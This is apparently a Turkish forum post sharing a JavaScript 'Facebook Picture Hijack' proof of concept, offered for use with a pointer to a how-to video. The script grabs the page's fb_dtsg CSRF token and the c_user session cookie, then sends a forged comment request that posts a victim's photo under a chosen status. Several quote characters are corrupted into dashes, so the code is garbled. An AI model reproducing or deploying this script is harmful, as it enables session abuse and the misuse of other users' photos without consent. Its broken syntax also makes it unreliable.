[hide] eyw
-----Javascript Facebook Picture Hijack PoC----
var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack
function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = --;
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=-)[1].split(-;-)[0],
h = "ft_ent_identifier=-+statuslinkID+-&comment_text=-+yourMessage +-&source=1&client_id=1371674471412:1000847939&attached_photo_fbid=-+photofbID+-&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=- + c + -&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=- + e;
m = generatePhstamp(h, e);
h += -&phstamp=- + m;
picture = new XMLHttpRequest();
picture.open("POST", "
https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at
http://facebook.com/-+statuslinkID);
VİDEO ; [video=youtube]
[/hide]
Gönül İsterdi Ben Çekmek İsterdim Ama Malesef Zamanım Olmuyor Videodaki İşlemleri Yapın Kolay Gelsin Arkadaşlar Zevkli Geçmesi Dileğiyle..
